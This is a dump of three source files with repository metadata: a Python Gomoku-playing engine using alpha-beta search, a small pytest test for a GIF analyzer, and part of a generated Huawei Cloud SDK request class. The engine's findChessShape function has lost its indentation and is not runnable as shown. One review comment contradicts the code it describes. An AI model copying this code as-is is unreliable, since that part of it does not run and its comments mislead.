9a5d27e164e9b946f450c58e1fa6c0999b915726 | a7de66f4d29c4ecf3abf35182aa6c7b5911bdbf1 | /Final_MyGomoku.py | a61f4c630a45a29981f2158b608dfee63c9a474d | [] | no_license | mengfeidu/GOMOKU-agent-with-python | fe93752219bb31abbd902f74948dd6a2405d60c0 | b153a323a28efe41d217e0b52d97b7db44432c72 | refs/heads/main | 2023-09-02T08:35:46.639576 | 2021-10-23T15:55:34 | 2021-10-23T15:55:34 | 420,104,737 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29,518 | py | import random
import pisqpipe as pp
from pisqpipe import DEBUG_EVAL, DEBUG
import math
import copy
import time
pp.infotext = 'name="pbrain-pyrandom", author="Jan Stransky", version="1.0", country="Czech Republic", www="https://github.com/stranskyjan/pbrain-pyrandom"'
MAX_BOARD = 100
# Physical board buffer; only the pp.width x pp.height region is used.
board = [[0 for i in range(MAX_BOARD)] for j in range(MAX_BOARD)]
THRESHOLD = 3  # NOTE(review): not referenced in this chunk -- confirm before removing


def inBoundary(x, y):
    """Return True if (x, y) lies inside the active pp.width x pp.height area."""
    # def instead of an assigned lambda (PEP 8 E731); same callable contract.
    return 0 <= x < pp.width and 0 <= y < pp.height


# Forced-win ("kill chess") bookkeeping: Zobrist hash -> winning move.
recordWin = {}
def get_zobrist(hashTable):
    """Fill hashTable with one large random key per board cell (Zobrist hashing).

    XOR-combining these keys yields a near-collision-free hash of a position.
    """
    for i in range(pp.width):
        for j in range(pp.height):
            # 10**30 (an int), not 1e30: random.randint requires integer
            # bounds -- a float argument raises TypeError on Python 3.12+.
            hashTable[(i, j)] = random.randint(0, 10**30)
    return
AlreadyKill = False  # whether a forced win ("kill") has already been found
hashTableForP1 = {}  # Zobrist keys for player 1's stones
get_zobrist(hashTableForP1)
hashTableForP2 = {}  # Zobrist keys for player 2's (and blocked) cells
get_zobrist(hashTableForP2)
def chess2int(board):
    """Collapse the active board area into a single Zobrist hash integer.

    Player-1 stones XOR in keys from hashTableForP1; every other non-empty
    cell XORs in the player-2 key (matching the original's `else` branch).
    """
    h = 0
    for col in range(pp.width):
        for row in range(pp.height):
            cell = board[col][row]
            if cell == 0:
                continue
            table = hashTableForP1 if cell == 1 else hashTableForP2
            h ^= table[(col, row)]
    return h
def brain_init():
    """Validate the board size announced by the manager and acknowledge."""
    too_small = pp.width < 5 or pp.height < 5
    too_big = pp.width > MAX_BOARD or pp.height > MAX_BOARD
    if too_small:
        pp.pipeOut("ERROR size of the board")
    elif too_big:
        pp.pipeOut("ERROR Maximal board size is {}".format(MAX_BOARD))
    else:
        pp.pipeOut("OK")
def brain_restart():
    """Clear every cell of the active board area and acknowledge."""
    for col in range(pp.width):
        board[col][:pp.height] = [0] * pp.height
    pp.pipeOut("OK")
def isFree(x, y):
    """Return True if (x, y) is on the board and currently empty."""
    return 0 <= x < pp.width and 0 <= y < pp.height and board[x][y] == 0
def brain_my(x, y):
    """Record our own stone (value 1) at (x, y); complain if occupied."""
    if not isFree(x, y):
        pp.pipeOut("ERROR my move [{},{}]".format(x, y))
        return
    board[x][y] = 1
def brain_opponents(x, y):
    """Record the opponent's stone (value 2) at (x, y)."""
    if not isFree(x, y):
        pp.pipeOut("ERROR opponents's move [{},{}]".format(x, y))
        return
    board[x][y] = 2
def brain_block(x, y):
    """Mark (x, y) as a blocked/forbidden square (value 3)."""
    if not isFree(x, y):
        pp.pipeOut("ERROR winning move [{},{}]".format(x, y))
        return
    board[x][y] = 3
def brain_takeback(x, y):
    """Undo the move at (x, y). Return 0 on success, 2 when there is nothing to undo."""
    inside = 0 <= x < pp.width and 0 <= y < pp.height
    if inside and board[x][y] != 0:
        board[x][y] = 0
        return 0
    return 2
def brain_turn():
    """Fallback brain: play on a uniformly random free square."""
    if pp.terminateAI:
        return
    i = 0
    while True:
        # randrange excludes the upper bound.  The original randint(0, pp.width)
        # could yield x == pp.width / y == pp.height, off-board coordinates that
        # always failed the isFree check and only wasted iterations.
        x = random.randrange(pp.width)
        y = random.randrange(pp.height)
        i += 1
        if pp.terminateAI:
            return
        if isFree(x, y):
            break
    if i > 1:
        pp.pipeOut("DEBUG {} coordinates didn't hit an empty field".format(i))
    pp.do_mymove(x, y)
def Mybrain_turn():
    # Main brain: one ply of move generation followed by an alpha-beta search
    # (via the external `value()` function, defined later in the file) with a
    # ~15 second wall-clock budget.  Plays the best move found via pp.do_mymove.
    begin = time.time()
    newboard = []  # shrinkage
    for rowindex in range(pp.width):
        tmp = board[rowindex]
        newboard.append(copy.deepcopy(tmp[0:pp.height]))
    # The kill-chess search did not perform well overall ... though on the
    # special cases it does hit, it wins instantly, which is quite satisfying.
    # chessnum = chess2int(newboard)
    # if chessnum in recordWin:
    #     x, y = recordWin[chessnum]
    #     if isFree(x, y):
    #         return (x, y)
    #
    # fkt = FKTexplore(board=board, threshold=10)
    # fkt.fktSolution()
    # if fkt.winChoicePosi is not None:
    #     x, y = fkt.winChoicePosi
    #     pp.do_mymove(x, y)
    #     return
    successor = get_successors(newboard, player=1)
    player = 1  # assume it is our side's turn
    best_position = None
    alpha0 = -20000  # score of a certain loss
    beta0 = 10000  # score of a certain win
    # NOTE(review): if `successor` were ever empty, best_position stays None
    # and the unpack below raises -- get_successors appears to always return
    # at least one move, but confirm.
    for position in successor:
        if time.time() - begin > 14.99:
            break
        x1, y1 = position
        newboard[x1][y1] = player
        if len(successor) > 1:
            tmp_value = value(depth=0, player=1, alpha=alpha0, beta=beta0, board=newboard, position=position)
        else:
            best_position = position
            break
        newboard[x1][y1] = 0  # undo the trial move
        if tmp_value >= 10000:  # Win
            best_position = position
            break
        elif tmp_value > alpha0:
            best_position = position
            alpha0 = tmp_value
    x, y = best_position
    pp.do_mymove(x, y)
def nearKsquares(K, board):
    # One pass over the board: collect every empty square that has at least
    # one stone within Chebyshev distance K, ranked by how many stones are
    # nearby.  `allposition` counts occupied squares.
    NearNeighbor = dict()
    allposition = 0
    for x in range(pp.width):
        for y in range(pp.height):
            if board[x][y] == 0:
                neighbor_num = 0
                for x_might in range(max(x - K, 0), min(pp.width, x + K + 1)):
                    for y_might in range(max(y - K, 0), min(pp.height, y + K + 1)):
                        if board[x_might][y_might] != 0:  # may be a bit remote
                            neighbor_num += 1
                if neighbor_num > 0:
                    NearNeighbor[(x, y)] = neighbor_num
            else:
                allposition += 1
    # Narrow the search space once the game has developed a little: keep only
    # squares with more than one neighbouring stone.
    if len(NearNeighbor) >= 3 and allposition >= 3:
        NearNeighbor = dict((key, value) for key, value in NearNeighbor.items() if value > 1)
    NearNeighborlist = sorted(NearNeighbor.keys(), key=lambda x: NearNeighbor[x], reverse=True)
    if len(NearNeighbor) == 0:
        # Empty (or over-filtered) candidate set: open at the board centre.
        return [(int(pp.width / 2), int(pp.height / 2))]
    return NearNeighborlist
def if_win(board, player, x_last, y_last):
    """Return True if the stone just played at (x_last, y_last) completes
    five-in-a-row for `player` in any of the four line directions.

    Only cells within four steps of the last move can take part in such a
    row, so each direction scans a 9-cell window centred on the move.
    """
    for dx, dy in ((1, 0), (0, 1), (1, 1), (1, -1)):
        run = 0
        for step in range(-4, 5):
            cx = x_last + dx * step
            cy = y_last + dy * step
            if inBoundary(cx, cy) and board[cx][cy] == player:
                run += 1
                if run == 5:
                    return True
            else:
                # Off-board or non-player cell breaks the run, exactly as the
                # original's clipped per-direction loops did.
                run = 0
    return False
def findChessShape(board, direction, current_position, player, SpecialChess, if_setpoint=True):
i, j = current_position
opponent = 3 - player
deltx, delty = direction
# 均按一定次序 从左到右 / 从上到下 / 西南-东北 / 西北 - 东南
# for deltx, delty in [(1, 0), (0, 1), (1, 1), (1, -1)]:
# 大一统模型,搞起
chessShape = [player]
x = i
y = j
if deltx == 1:
for x in range(i + 1, min(i + 5, pp.width)):
y += delty
if y < 0 or y >= pp.height:
break
if board[x][y] == opponent:
break
if board[x][y] == 0 and chessShape[-1] == 0:
chessShape.append(0)
break
chessShape.append(board[x][y])
else:
for y in range(j + 1, min(j + 5, pp.height)):
if y < 0 or y >= pp.height:
break
if board[x][y] == opponent:
break
if board[x][y] == 0 and chessShape[-1] == 0:
chessShape.append(0)
break
chessShape.append(board[x][y])
x = i - deltx
y = j - delty
tmp = sum(chessShape)
if inBoundary(x, y) and board[x][y] == 0:
# 左侧无挡
if tmp == 4 * player:
if chessShape == [player, player, player, player, 0]:
SpecialChess['liveFour'] += 1
if if_setpoint:
SpecialChess['p4'].append((x, y))
else:
SpecialChess['pushFour'] += 1
if if_setpoint:
if len(chessShape) > 4:
SpecialChess['p4'].append((i + deltx * chessShape.index(0), j + delty * chessShape.index(0)))
else:
SpecialChess['p4'].append((x, y))
if tmp == 3 * player:
if len(chessShape) == 5:
if chessShape == [player, 0, player, 0, player]:
SpecialChess['sleepThree'] += 1
if if_setpoint:
SpecialChess['s3'].append((i + deltx, j + delty))
SpecialChess['s3'].append((i + 3 * deltx, j + 3 * delty))
else:
SpecialChess['liveThree'] += 1
if if_setpoint:
SpecialChess['l3'].append((x, y))
SpecialChess['l3'].append((i + deltx * chessShape.index(0), j + delty * chessShape.index(0)))
if chessShape[-2] == player:
SpecialChess['l3'].append((i + 4 * deltx, j + 4 * delty))
elif len(chessShape) == 4:
if chessShape == [player, player, player, 0]:
if inBoundary(i - 2 * deltx, j - 2 * delty) and board[i - 2 * deltx][j - 2 * delty] == 0:
SpecialChess['liveThree'] += 1
if if_setpoint:
SpecialChess['l3'].append((i - deltx, j - delty))
SpecialChess['l3'].append((i + 3 * deltx, j + 3 * delty))
else:
SpecialChess['sleepThree'] += 1
if if_setpoint:
SpecialChess['s3'].append((i - deltx, j - delty))
SpecialChess['s3'].append((i + 3 * deltx, j + 3 * delty))
else:
SpecialChess['sleepThree'] += 1
if if_setpoint:
SpecialChess['s3'].append((i - deltx, j - delty))
SpecialChess['s3'].append((i + chessShape.index(0) * deltx, j + chessShape.index(0) * delty))
elif len(chessShape) == 3 and inBoundary(i - 2 * deltx, j - 2 * delty) and board[i - 2 * deltx][
j - 2 * delty] == 0:
SpecialChess['sleepThree'] += 1
if if_setpoint:
SpecialChess['s3'].append((i - deltx, j - delty))
if tmp == 2 * player:
if len(chessShape) == 4:
if chessShape == [player, player, 0, 0]:
if inBoundary(i + 4 * deltx, j + 4 * delty) and board[i + 4 * deltx][j + 4 * delty] == player:
SpecialChess['sleepThree'] += 1
if if_setpoint:
SpecialChess['s3'].append((i + 2 * deltx, j + 2 * delty))
SpecialChess['s3'].append((i + 3 * deltx, j + 3 * delty))
elif inBoundary(i - 2 * deltx, j - 2 * delty) and board[i - 2 * deltx][j - 2 * delty] == 0:
SpecialChess['liveTwo'] += 1
if if_setpoint:
SpecialChess['l2'].append((i - deltx, j - delty))
if inBoundary(i + 4 * deltx, j + 4 * delty) and board[i + 4 * deltx][j + 4 * delty]:
SpecialChess['l2'].append((i + 2 * deltx, j + 2 * delty))
if inBoundary(i - 3 * deltx, j - 3 * delty) and board[i - 3 * deltx][j - 3 * delty] == 0:
SpecialChess['l2'].append((i - 2 * deltx, j - 2 * delty))
else:
SpecialChess['sleepTwo'] += 1 # some question
else:
SpecialChess['sleepTwo'] += 1
elif len(chessShape) == 5: # [1,0,1,0,0]
SpecialChess['liveTwo'] += 1
if if_setpoint:
SpecialChess['l2'].append((i + deltx, j + delty))
SpecialChess['l2'].append((i + 3 * deltx, j + 3 * delty))
if tmp == player and len(chessShape) == 3:
# maybe live three
# maybe live Two
x = i + 2 * deltx
y = j + 2 * delty
newshape = []
for _ in range(2):
x += deltx
y += delty
if inBoundary(x, y) and board[x][y] != opponent:
newshape.append(board[x][y])
else:
break
if newshape == [player, player]:
SpecialChess['sleepThree'] += 1
if if_setpoint:
SpecialChess['s3'].append((i + deltx, j + delty))
SpecialChess['s3'].append((i + 2 * deltx, j + 2 * delty))
elif newshape == [player, 0]:
SpecialChess['liveTwo'] += 1
if if_setpoint:
SpecialChess['l2'].append((i + deltx, j + delty))
SpecialChess['l2'].append((i + 2 * deltx, j + 2 * delty))
elif newshape == [player]:
SpecialChess['sleepTwo'] += 1
elif not inBoundary(x, y) or board[x][y] == opponent:
if tmp == 4 * player: # ??
if len(chessShape) == 5:
SpecialChess['pushFour'] += 1
if if_setpoint:
SpecialChess['p4'].append((i + chessShape.index(0) * deltx, j + chessShape.index(0) * delty))
if tmp == 3 * player:
if len(chessShape) == 5:
SpecialChess['sleepThree'] += 1
if if_setpoint:
SpecialChess['s3'].append((i + chessShape.index(0) * deltx, j + chessShape.index(0) * delty))
if chessShape == [player, 0, player, 0, player]:
SpecialChess['s3'].append((i + 3 * deltx, j + 3 * delty))
else:
SpecialChess['s3'].append((i + 4 * deltx, j + 4 * delty))
def get_specialcases(board, player, if_setpoint=False, attacker=False):
    """Scan the whole board and tally `player`'s threat shapes.

    Returns a dict with counts of live/sleep twos, threes and fours plus --
    when if_setpoint is True -- the candidate points that create or extend
    them ('p4', 'l3', 's3', 'l2').

    `attacker` is accepted for compatibility with the callers inside
    FKTexplore.fktSuccessor, which pass attacker=True/False; without this
    parameter those calls raise TypeError.  The shape scan itself does not
    distinguish attacker and defender, so the flag is currently unused.
    """
    SpecialChess = {'renju': 0, 'liveFour': 0, 'pushFour': 0,
                    'liveThree': 0, 'sleepThree': 0, 'liveTwo': 0, 'sleepTwo': 0,
                    'p4': [], 'l3': [], 's3': [], 'l2': []}
    for i in range(pp.width):
        for j in range(pp.height):
            if board[i][j] != player:
                continue
            for direction in [(1, 0), (0, 1), (1, 1), (1, -1)]:
                findChessShape(board=board, direction=direction, player=player,
                               current_position=(i, j),
                               SpecialChess=SpecialChess, if_setpoint=if_setpoint)
    return SpecialChess
class FKTexplore:
    '''
    fast kill test: once the opponent shows a weakness, press the attack in
    one breath -- search only forcing moves (fours / open threes) looking
    for a guaranteed winning sequence for player 1.

    NOTE(review): fktSuccessor calls get_specialcases with an `attacker=`
    keyword that the function (as defined above) does not accept -- this
    path raises TypeError if executed; it is currently only reachable from
    code that is commented out in Mybrain_turn.  Confirm before re-enabling.
    '''
    def __init__(self, board, threshold, player=1):
        self.board = board
        self.threshold = threshold  # depth limit of the fast-kill search
        self.player = player  # side whose forced win we probe (1 = us)
        self.threatForopponent = []  # opponent's possible replies, e.g. a rush-four / a block
        self.lastPosi = None
        self.winChoicePosi = None  # only win will be set
        # Zobrist hash uniquely identifying the current position
        self.chessnum = chess2int(self.board)
        # transposition table of already-explored positions -> result
        self.endfkt = {}
    def fktvalue(self, depth, chesshape):
        # all-or-nothing: either this line wins for player 1 or it scores 0
        x, y = self.lastPosi
        if if_win(board=self.board, player=self.player, x_last=x, y_last=y):
            if self.player == 1:
                return 1
            else:
                return 0
        if depth < self.threshold:
            depth += 1
        else:
            return 0
        # continue to alpha - beta
        if self.player == 1:
            # player 2's turn
            self.player = 3 - self.player
            return self.fktmin(depth=depth, chesshape=chesshape)
        else:
            # player 1's turn
            self.player = 3 - self.player
            return self.fktmax(depth=depth, chesshape=chesshape)
    def fktmin(self, depth, chesshape):
        # Minimizing node: player 2 tries to refute the kill (v == 0 means refuted).
        v = 1
        successors = self.fktSuccessor()
        if len(successors) == 0:
            return 0
        for new_posi in successors:
            x, y = new_posi
            self.board[x][y] = self.player  # player 2's stone
            self.lastPosi = (x, y)
            chesshape ^= hashTableForP2[(x, y)]
            if chesshape in self.endfkt:
                v = self.endfkt[chesshape]
            else:
                v = min(v, self.fktvalue(depth, chesshape))
                self.endfkt[chesshape] = v
            # traceback: undo hash and trial move
            chesshape ^= hashTableForP2[(x, y)]
            self.board[x][y] = 0
            if v == 0:  # player 1 did not win on this line
                global AlreadyKill
                AlreadyKill = False
                return v
        return v
    def fktmax(self, depth, chesshape):
        # Maximizing node: player 1 (our side) to move.
        v = 0
        successors = self.fktSuccessor()
        if len(successors) == 0:
            return 0  # no forcing move available -- no kill here
        for new_posi in successors:  # player 1's candidate moves
            x, y = new_posi
            self.board[x][y] = self.player
            self.lastPosi = (x, y)
            chesshape ^= hashTableForP1[(x, y)]
            if chesshape in self.endfkt:
                v = self.endfkt[chesshape]
            else:
                v = max(v, self.fktvalue(depth=depth, chesshape=chesshape))
                self.endfkt[chesshape] = v
            # traceback: undo hash and trial move
            chesshape ^= hashTableForP1[(x, y)]
            self.board[x][y] = 0
            if v == 1:
                # forced win found -- remember it
                global AlreadyKill
                AlreadyKill = True
                recordWin[chesshape] = (x, y)
                return v
        return v
    def fktSuccessor(self):
        # Core of the search (marked by the author for a rewrite):
        # generate only forcing moves for the side to move.
        if self.player == 1:
            # create (live-three / live-four / rush-four) threats, or block the
            # opponent's rush-four
            mykill = get_specialcases(self.board, self.player, if_setpoint=True, attacker=True)
            mythreat = get_specialcases(self.board, 3 - self.player, if_setpoint=True, attacker=False)
            if len(mykill['p4']) > 0:
                return mykill['p4']
            if len(mythreat['p4']) > 0:
                return mythreat['p4']  # block the rush-four
            if len(mykill['l3']) > 0:
                return mykill['l3']  # extend to a live four
            if len(mythreat['l3']) > 0:
                # NOTE(review): returns mykill['s3'] rather than a block of the
                # opponent's live three -- looks intentional (keep attacking
                # with sleep-threes) but confirm.
                return mykill['s3']
            else:
                record = {}
                for chesspoi in mykill['s3']:
                    if chesspoi in record:
                        record[chesspoi] += 5
                    else:
                        record[chesspoi] = 1
                for chesspoi in mykill['l2']:
                    if chesspoi in record:
                        record[chesspoi] += 5
                    else:
                        record[chesspoi] = 1
                successor = sorted(record.keys(), key=lambda x: record[x], reverse=True)
                return successor
        else:
            # defender: make (live-four / rush-four) threats, or block the
            # attacker's rush-four / live-three
            mykill = get_specialcases(self.board, self.player, if_setpoint=True, attacker=True)
            mythreat = get_specialcases(self.board, 3 - self.player, if_setpoint=True, attacker=False)
            if len(mykill['p4']) > 0:
                return mykill['p4']
            if len(mythreat['p4']) > 0:
                return mythreat['p4']  # block the rush-four
            if len(mykill['l3']) > 0:
                return mykill['l3']  # extend to a live four
            return mythreat['l3']
    def fktSolution(self):
        '''
        Determine whether a forced win ("kill") exists from the current
        position; on success, remember the winning move in recordWin and in
        self.winChoicePosi.
        '''
        player = self.player
        chesshape = self.chessnum
        successors = self.fktSuccessor()
        for posi in successors:
            x, y = posi
            self.board[x][y] = player
            self.lastPosi = posi
            # NOTE(review): hashes with player 1's table regardless of
            # self.player -- fine as long as the class is only used with
            # player=1 (the default); confirm.
            chesshape ^= hashTableForP1[(x, y)]
            v = self.fktvalue(depth=0, chesshape=chesshape)
            self.endfkt[chesshape] = v
            # traceback: undo hash and trial move
            chesshape ^= hashTableForP1[(x, y)]
            self.board[x][y] = 0
            if v == 1:
                # kill found
                global AlreadyKill
                AlreadyKill = True
                tmp = chess2int(self.board)
                recordWin[tmp] = (x, y)
                # this attribute is the only channel reporting the result
                self.winChoicePosi = (x, y)
                return
        return
def get_successors(board, player):
    """Generate candidate moves for *player*, most urgent first.

    Forcing moves (rush fours, live threes -- ours or the opponent's) are
    returned immediately; otherwise lesser threats are scored and the points
    are returned best-first, falling back to squares near existing stones.
    """
    attack = get_specialcases(board, player, True)
    if attack['p4']:
        return attack['p4']  # we can complete a four: play it

    defend = get_specialcases(board, 3 - player, True)
    if defend['p4']:
        return defend['p4']  # opponent threatens a four: block it
    if attack['l3']:
        return attack['l3']  # promote our live three
    if defend['l3']:
        # Must answer the opponent's live three; counter-threats with our
        # sleeping threes are also worth considering.
        forced = defend['l3']
        forced.extend(attack['s3'])
        return forced

    # No forcing move: vote on lesser-threat points.  A point's first
    # sighting scores 1; repeat sightings add the given bump.
    votes = {}

    def _tally(points, bump):
        for point in points:
            if point in votes:
                votes[point] += bump
            else:
                votes[point] = 1

    _tally(attack['s3'], 5)
    _tally(attack['l2'], 5)
    _tally(defend['s3'], 1)
    _tally(defend['l2'], 1)

    if not votes:
        return nearKsquares(2, board)

    strong = [point for point, score in votes.items() if score > 2]
    if strong:
        return strong

    # Pad with nearby squares at decaying weights, then sort best-first.
    weight = 0.9
    for point in nearKsquares(2, board):
        if point not in votes:
            votes[point] = weight
        weight -= 0.1
    return sorted(votes.keys(), key=lambda p: votes[p], reverse=True)
# 随机
# 小飞
def evaluate(board, player):
    """Static evaluation of *board* from player 1's point of view.

    *player* is the side that just moved; on equal shape counts the side to
    move next is favoured, which flips the sign of the tie adjustment and
    decides who wins outright on fours / unanswered live threes.
    Returns +/-10000 for decided positions, otherwise a weighted shape score.
    """
    weights = {'renju': 0, 'liveFour': 10000, 'pushFour': 2,
               'liveThree': 2, 'sleepThree': 1.5, 'liveTwo': 1, 'sleepTwo': 0.2}
    mine = get_specialcases(board, player=1)
    theirs = get_specialcases(board, player=2)

    if player == 1:
        # We just moved, so the opponent moves next: their four wins, and
        # their live three wins unless we already have a four of our own.
        if theirs['liveFour'] + theirs['pushFour'] >= 1:
            return -10000
        if theirs['liveThree'] >= 1 and (mine['pushFour'] + mine['liveFour'] == 0):
            return -10000
        if mine['liveThree'] > 1:
            weights['liveThree'] *= 10  # double live-three is near-winning
        if mine['pushFour'] > 1:
            weights['pushFour'] *= 10
        tie_sign = -1.0  # ties favour the opponent (they move next)
    else:
        # Opponent just moved, so we move next: our four wins, and our live
        # three wins unless they already have a four.
        if mine['liveFour'] + mine['pushFour'] >= 1:
            return +10000
        if mine['liveThree'] >= 1 and (theirs['pushFour'] + theirs['liveFour'] == 0):
            return +10000
        if theirs['liveThree'] > 1:
            weights['liveThree'] *= 10
        if theirs['pushFour'] > 1:
            weights['pushFour'] *= 10
        tie_sign = 1.0  # ties favour us (we move next)

    total = 0
    for shape, w in weights.items():
        # Small nudge when both sides hold the same non-zero count of a shape.
        tie_bonus = 0.1 * w * int((mine[shape] > 0) and (mine[shape] == theirs[shape]))
        total += w * (mine[shape] - theirs[shape]) + tie_sign * tie_bonus
    return total
def value(depth, player, board, position, alpha, beta):
    """Minimax value of *board* after *player* placed a stone at *position*.

    Terminal wins score +/-10000; at the depth limit the static evaluation
    is returned; otherwise the search alternates to the other side.
    """
    row, col = position
    # The move just played may have won outright.
    if if_win(board=board, player=player, x_last=row, y_last=col):
        return 10000 if player == 1 else -10000
    # Depth cutoff: fall back to the static evaluator.
    if depth >= THRESHOLD:
        return evaluate(board, player=player)
    depth += 1
    if player == 1:
        # Player 2 replies next (minimizing node).
        return min_value(depth=depth, player=2, board=board, position=position, alpha=alpha, beta=beta)
    # Player 1 replies next (maximizing node).
    return max_value(depth=depth, player=1, board=board, position=position, alpha=alpha, beta=beta)
def max_value(depth, player, board, position, alpha, beta):
    """Maximizing node of the alpha-beta search (our side, player 1)."""
    best = -math.inf
    for move in get_successors(board, player=player):  # player 1's candidate moves
        row, col = move
        board[row][col] = player  # play trial move in place
        score = value(depth=depth, player=1, board=board, position=move, alpha=alpha, beta=beta)
        # traceback: undo the trial move
        board[row][col] = 0
        if score > best:
            best = score
        alpha = max(alpha, best)
        if alpha >= beta:
            return best  # beta cutoff: opponent will avoid this line
    return best
def min_value(depth, player, board, position, alpha, beta):
    """Minimizing node of the alpha-beta search (opponent, player 2)."""
    worst = math.inf
    for move in get_successors(board, player=player):
        row, col = move
        board[row][col] = player  # play trial move in place
        score = value(depth, 2, board, move, alpha, beta)
        # traceback: undo the trial move
        board[row][col] = 0
        if score < worst:
            worst = score
        beta = min(beta, worst)
        if alpha >= beta:
            return worst  # alpha cutoff: we will avoid this line
    return worst
def brain_end():
    """Pipe-protocol hook called when the game ends; this brain holds no
    per-game resources, so there is nothing to clean up."""
def brain_about():
    # Pipe-protocol hook: report the brain's info text back to the manager.
    pp.pipeOut(pp.infotext)
if DEBUG_EVAL:
    # Windows-only debug aid: paint board values directly onto the manager
    # window with raw Win32 GDI calls.
    import win32gui
    def brain_eval(x, y):
        # TODO check if it works as expected
        # Draws board[x][y] into the top-right corner of the foreground
        # (piskvork) window, then releases the device context.
        wnd = win32gui.GetForegroundWindow()
        dc = win32gui.GetDC(wnd)
        rc = win32gui.GetClientRect(wnd)
        c = str(board[x][y])
        win32gui.ExtTextOut(dc, rc[2] - 15, 3, 0, None, c, ())
        win32gui.ReleaseDC(wnd, dc)
######################################################################
# A possible way how to debug brains.
# To test it, just "uncomment" it (delete enclosing """)
######################################################################
# define a file for logging ...
# DEBUG_LOGFILE = "F:/Gomokuoutcome.log"
# # ...and clear it initially
# with open(DEBUG_LOGFILE, "w") as f:
# pass
# define a function for writing messages to the file
# def logDebug(msg):
# with open(DEBUG_LOGFILE, "a") as f:
# f.write(msg + "\n")
# f.flush()
# define a function to get exception traceback
# def logTraceBack():
# import traceback
# with open(DEBUG_LOGFILE, "a") as f:
# traceback.print_exc(file=f)
# f.flush()
# raise
# use logDebug wherever
# use try-except (with logTraceBack in except branch) to get exception info
# an example of problematic function
# def brain_turn():
# logDebug("some message 1")
# try:
# logDebug("some message 2")
# 1. / 0. # some code raising an exception
# logDebug("some message 3") # not logged, as it is after error
# except:
# logTraceBack()
######################################################################
# "overwrites" functions in pisqpipe module
# Register this brain's callbacks with the pisqpipe protocol driver;
# pp.main() dispatches manager commands to these handlers.
pp.brain_init = brain_init
pp.brain_restart = brain_restart
pp.brain_my = brain_my
pp.brain_opponents = brain_opponents
pp.brain_block = brain_block
pp.brain_takeback = brain_takeback
pp.brain_turn = Mybrain_turn  # custom search entry point (defined earlier in this file)
pp.brain_end = brain_end
pp.brain_about = brain_about
if DEBUG_EVAL:
    pp.brain_eval = brain_eval  # only hooked up when debug overlay is enabled
def main():
    # Hand control to the pisqpipe protocol loop (blocks until the manager exits).
    pp.main()
if __name__ == "__main__":
    main()
| [
"noreply@github.com"
] | noreply@github.com |
549746b4c2e4c7057bd7732d19f58753950efb1d | 5a3c4b802ea7d5ce380c38415929ebaa8799eb06 | /tests/test_analyze_gifs.py | 700b9bad30c536d79dd4ab352c4a24dcff1e0a73 | [
"MIT"
] | permissive | get-wrecked/gifalyzer | fe18855c83b2b9e2188faef92b317fa81e913b4d | 0731d03766cfecf3fc6c64cc17022563da09b85b | refs/heads/master | 2022-04-10T10:57:35.602500 | 2019-06-10T22:32:04 | 2019-06-10T22:32:04 | 93,275,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 514 | py | import os
import pytest
from gifalyzer import analyze_gif
def test_analyze_gifs_normal():
    # The fixture name encodes the expected report:
    # 200x202 px, 26 frames, 130 ms inter-frame delay (incl. last frame),
    # loop=0 (repeat forever).
    report = analyze_gif(get_sample('200x202-26-130-130-0.gif'))
    assert report['dimensions'] == (200, 202)
    assert report['frame_count'] == 26
    assert report['frame_delay_ms'] == 130
    assert report['last_frame_delay_ms'] == 130
    assert report['loop'] == 0
def get_sample(sample_name):
    """Return the absolute path of a test fixture under the samples/ dir
    next to this test module."""
    return os.path.join(os.path.dirname(__file__), 'samples', sample_name)
| [
"git@thusoy.com"
] | git@thusoy.com |
a51fd66e325e13d07571a0145b88b73ff676b50b | a2d36e471988e0fae32e9a9d559204ebb065ab7f | /huaweicloud-sdk-drs/huaweicloudsdkdrs/v3/model/update_database_object_req.py | 698caaaa0fef8649ba108b232f7219fc181dd69a | [
"Apache-2.0"
] | permissive | zhouxy666/huaweicloud-sdk-python-v3 | 4d878a90b8e003875fc803a61414788e5e4c2c34 | cc6f10a53205be4cb111d3ecfef8135ea804fa15 | refs/heads/master | 2023-09-02T07:41:12.605394 | 2021-11-12T03:20:11 | 2021-11-12T03:20:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,360 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class UpdateDatabaseObjectReq:
    """Request body for updating the database-object selection of a DRS job.

    Generated huaweicloud-sdk model: attribute storage is in private
    ``_name`` slots exposed through properties; serialization metadata
    lives in ``openapi_types`` / ``attribute_map``.

    Attributes:
        openapi_types (dict): The key is attribute name
                              and the value is attribute type.
        attribute_map (dict): The key is attribute name
                              and the value is json key in definition.
    """

    # Attribute names whose values are masked as "****" by to_dict().
    sensitive_list = []

    openapi_types = {
        'job_id': 'str',
        'selected': 'bool',
        'sync_database': 'bool',
        'job': 'list[DatabaseInfo]'
    }

    attribute_map = {
        'job_id': 'job_id',
        'selected': 'selected',
        'sync_database': 'sync_database',
        'job': 'job'
    }

    def __init__(self, job_id=None, selected=None, sync_database=None, job=None):
        """UpdateDatabaseObjectReq - a model defined in huaweicloud sdk"""
        self._job_id = None
        self._selected = None
        self._sync_database = None
        self._job = None
        self.discriminator = None

        # job_id is required; the optional fields are only assigned when given.
        self.job_id = job_id
        if selected is not None:
            self.selected = selected
        if sync_database is not None:
            self.sync_database = sync_database
        if job is not None:
            self.job = job

    @property
    def job_id(self):
        """Gets the job_id of this UpdateDatabaseObjectReq.

        Task ID.

        :return: The job_id of this UpdateDatabaseObjectReq.
        :rtype: str
        """
        return self._job_id

    @job_id.setter
    def job_id(self, job_id):
        """Sets the job_id of this UpdateDatabaseObjectReq.

        Task ID.

        :param job_id: The job_id of this UpdateDatabaseObjectReq.
        :type: str
        """
        self._job_id = job_id

    @property
    def selected(self):
        """Gets the selected of this UpdateDatabaseObjectReq.

        Whether to select objects individually: true = migrate only the
        user-chosen objects, false = migrate everything (default false).

        :return: The selected of this UpdateDatabaseObjectReq.
        :rtype: bool
        """
        return self._selected

    @selected.setter
    def selected(self, selected):
        """Sets the selected of this UpdateDatabaseObjectReq.

        Whether to select objects individually: true = migrate only the
        user-chosen objects, false = migrate everything (default false).

        :param selected: The selected of this UpdateDatabaseObjectReq.
        :type: bool
        """
        self._selected = selected

    @property
    def sync_database(self):
        """Gets the sync_database of this UpdateDatabaseObjectReq.

        Whether synchronization is at database level.

        :return: The sync_database of this UpdateDatabaseObjectReq.
        :rtype: bool
        """
        return self._sync_database

    @sync_database.setter
    def sync_database(self, sync_database):
        """Sets the sync_database of this UpdateDatabaseObjectReq.

